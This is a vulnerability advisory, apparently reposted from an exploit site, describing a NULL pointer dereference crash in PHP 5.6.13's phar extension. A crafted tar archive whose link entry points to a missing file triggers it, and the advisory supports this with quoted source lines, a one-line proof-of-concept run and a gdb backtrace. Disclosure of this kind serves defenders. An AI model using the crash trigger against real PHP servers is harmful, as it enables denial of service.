PHP 5.6.13 phar_get_fp_offset() Null pointer dereference Vulnerability

Description:
------------
If a Tar entry has the Link indicator set and points to an nonexisting file, phar_get_link_source() returns a NULL value phar/util.c:69:

if (SUCCESS == zend_hash_find(&(entry->phar->manifest), entry->link, strlen(entry->link), (void **)&link_entry) ||
SUCCESS == zend_hash_find(&(entry->phar->manifest), link, strlen(link), (void **)&link_entry)) {
.......
}else {
.......
return NULL;
}

The NULL value gets passed into phar_get_fp_offset() at util.c:497:
(*ret)->zero = phar_get_fp_offset(phar_get_link_source(entry TSRMLS_CC) TSRMLS_CC);


The NULL pointer dereference occurs in phar_internal.h:444 where entry is NULL :
if (!entry->is_persistent)

This causes PHP to seg fault.


Proof Of Concept:
./php readphar.php Null_ptr_deref_in_phar_get_fp_offset.tar.phar
Segmentation fault


POC can be found here: https://www.dropbox.com/s/6hks64dopgcco9f/POC_Null_ptr_deref_in_phar_get_fp_offset.zip?dl=0


Actual result:
--------------
gdb-peda$ bt
#0 0x0000000000900df2 in phar_get_fp_offset (entry=0x0)
at /home/elaw/php-5.6.8_patched_phar/ext/phar/phar_internal.h:444
#1 0x0000000000904460 in phar_get_entry_data (ret=0x7fffffff9570,
fname=0x7ffff7f79bc8 "/home/elaw/php-5.6.8_patched_phar/sapi/cli/Modified_Tar.tar.phar", fname_len=0x40, path=0x7ffff7f77c80 "test.php", path_len=0x8, mode=0x155dd40 "r",
allow_dir=0x0, error=0x7fffffff95b0, security=0x0)
at /home/elaw/php-5.6.8_patched_phar/ext/phar/util.c:497
#2 0x000000000092de69 in phar_wrapper_open_url (
wrapper=0x1a0bb40 <php_stream_phar_wrapper>,
path=0x7ffff7f79d50 "phar:///home/elaw/php-5.6.8_patched_phar/sapi/cli/Modified_Tar.tar.phar/test.php", mode=0x15b7d60 "rb", options=0x0, opened_path=0x0,
context=0x7ffff7f72e78) at /home/elaw/php-5.6.8_patched_phar/ext/phar/stream.c:286
#3 0x0000000000cf3926 in _php_stream_open_wrapper_ex (
path=0x7ffff7f79d50 "phar:///home/elaw/php-5.6.8_patched_phar/sapi/cli/Modified_Tar.tar.phar/test.php", mode=0x15b7d60 "rb", options=0x8, opened_path=0x0,
context=0x7ffff7f72e78)
at /home/elaw/php-5.6.8_patched_phar/main/streams/streams.c:2064
#4 0x0000000000b0491e in zif_file_get_contents (ht=0x1, return_value=0x7ffff7f79d20,
return_value_ptr=0x7ffff7f3c980, this_ptr=0x0, return_value_used=0x1)
at /home/elaw/php-5.6.8_patched_phar/ext/standard/file.c:548
#5 0x00000000009353e2 in phar_file_get_contents (ht=0x1, return_value=0x7ffff7f79d20,
return_value_ptr=0x7ffff7f3c980, this_ptr=0x0, return_value_used=0x1)
at /home/elaw/php-5.6.8_patched_phar/ext/phar/func_interceptors.c:225
#6 0x0000000000eeaeec in zend_do_fcall_common_helper_SPEC (execute_data=0x7ffff7f3cc18)
at /home/elaw/php-5.6.8_patched_phar/Zend/zend_vm_execute.h:558
#7 0x0000000000f0441e in ZEND_DO_FCALL_SPEC_CONST_HANDLER (execute_data=0x7ffff7f3cc18)
at /home/elaw/php-5.6.8_patched_phar/Zend/zend_vm_execute.h:2599
#8 0x0000000000ee63d4 in execute_ex (execute_data=0x7ffff7f3cc18)
at /home/elaw/php-5.6.8_patched_phar/Zend/zend_vm_execute.h:363
#9 0x0000000000ee7d7c in zend_execute (op_array=0x7ffff7f70d00)
at /home/elaw/php-5.6.8_patched_phar/Zend/zend_vm_execute.h:388
#10 0x0000000000e1e55b in zend_execute_scripts (type=0x8, retval=0x0, file_count=0x3)
at /home/elaw/php-5.6.8_patched_phar/Zend/zend.c:1341
#11 0x0000000000ca9dec in php_execute_script (primary_file=0x7fffffffcd10)
at /home/elaw/php-5.6.8_patched_phar/main/main.c:2597
#12 0x0000000001190280 in do_cli (argc=0x5, argv=0x60400000ded0)
at /home/elaw/php-5.6.8_patched_phar/sapi/cli/php_cli.c:994
#13 0x0000000001192ee7 in main (argc=0x5, argv=0x60400000ded0)
at /home/elaw/php-5.6.8_patched_phar/sapi/cli/php_cli.c:1378
#14 0x00007ffff4b0db45 in __libc_start_main (main=0x1191984 <main>, argc=0x5,
argv=0x7fffffffe2a8, init=<optimized out>, fini=<optimized out>,
rtld_fini=<optimized out>, stack_end=0x7fffffffe298) at libc-start.c:287
#15 0x0000000000428d79 in _start ()

#  0day.today [2017-12-31]  #